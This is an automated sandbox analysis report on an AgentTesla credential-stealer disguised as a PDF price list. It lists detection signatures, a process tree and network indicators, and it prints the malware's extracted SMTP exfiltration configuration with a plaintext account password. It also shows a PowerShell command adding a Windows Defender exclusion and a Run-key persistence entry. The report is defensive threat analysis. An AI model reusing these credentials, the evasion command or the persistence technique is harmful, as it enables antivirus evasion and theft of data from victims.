Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
26.09 01.10.2024Fiyat Listesi.pdf.exe

Overview

General Information

Sample name:26.09 01.10.2024Fiyat Listesi.pdf.exe
Analysis ID:1519324
MD5:5b35e1e6cdf0d5277fa8dccd5fc06d26
SHA1:ae1f7a5ece26c423477fbb6048db707df4013cb6
SHA256:f7d4eed71f2bdb8ac845990506c335bb64af5877df1925794b000d4a7cf88b84
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 26.09 01.10.2024Fiyat Listesi.pdf.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ctsdvwT.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
  • ctsdvwT.exe (PID: 3264 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 3260 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.1894805275.0000000003171000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000B.00000002.4141088444.0000000002F2B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.ctsdvwT.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.ctsdvwT.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                8.2.ctsdvwT.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x336c8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3373a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x337c4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33856:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x338c0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33932:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x339c8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33a58:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 10 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Double Extension File Execution
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, NewProcessName: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, OriginalFileName: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7620, ProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ParentImage: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentProcessId: 7620, ParentProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7780, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessId: 7788, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ParentImage: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentProcessId: 7620, ParentProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7780, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.167.140.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, Initiated: true, ProcessId: 7788, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 63219
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ParentImage: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentProcessId: 7620, ParentProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7780, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T11:26:17.627129+020020301711A Network Trojan was detected192.168.2.463220108.167.140.123587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T11:24:39.741265+020028555421A Network Trojan was detected192.168.2.463220108.167.140.123587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T11:26:17.627129+020028397231Malware Command and Control Activity Detected192.168.2.463220108.167.140.123587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T11:26:17.627129+020028400321A Network Trojan was detected192.168.2.463220108.167.140.123587TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeReversingLabs: Detection: 28%
                    Multi AV Scanner detection for submitted file
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeReversingLabs: Detection: 28%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeJoe Sandbox ML: detected
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: oAlZ.pdbSHA2560 source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr
                    Source: Binary string: oAlZ.pdb source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 4x nop then jmp 07981045h0_2_07981577
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 076E0D5Dh5_2_076E128F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 076E0D5Dh5_2_076E159A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 07090D5Dh10_2_0709128F

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:63220 -> 108.167.140.123:587
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:63220 -> 108.167.140.123:587
                    Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:63220 -> 108.167.140.123:587
                    Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:63220 -> 108.167.140.123:587
                    Source: global trafficTCP traffic: 192.168.2.4:63219 -> 108.167.140.123:587
                    Source: Joe Sandbox ViewIP Address: 108.167.140.123 108.167.140.123
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: global trafficTCP traffic: 192.168.2.4:63219 -> 108.167.140.123:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: mail.musabody.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.musabody.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705109897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1830841149.0000000003167000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1913937997.0000000002D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1707971157.0000000005D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, POq2Ux.cs.Net Code: _4H57oeN1J
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, POq2Ux.cs.Net Code: _4H57oeN1J
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_0569EE20 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0569FC90,00000000,000000003_2_0569EE20
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: 26.09 01.10.2024Fiyat Listesi.pdf.exe
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_0324DE4C0_2_0324DE4C
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_058F73680_2_058F7368
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_058F00070_2_058F0007
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_058F00400_2_058F0040
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_058F73580_2_058F7358
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 0_2_07983C680_2_07983C68
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_00E597583_2_00E59758
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_00E5C9D83_2_00E5C9D8
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_00E54AA83_2_00E54AA8
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_00E53E903_2_00E53E90
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_00E58F903_2_00E58F90
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_00E541D83_2_00E541D8
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05696C743_2_05696C74
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_056926B03_2_056926B0
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05692D983_2_05692D98
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05698C973_2_05698C97
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_056908483_2_05690848
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697FA83_2_05697FA8
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeCode function: 3_2_05697FA33_2_05697FA3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 5_2_0143DE4C5_2_0143DE4C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 5_2_076E3A885_2_076E3A88
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_02F696388_2_02F69638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_02F64AA88_2_02F64AA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_02F6C9808_2_02F6C980
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_02F63E908_2_02F63E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_02F641D88_2_02F641D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 8_2_065504488_2_06550448
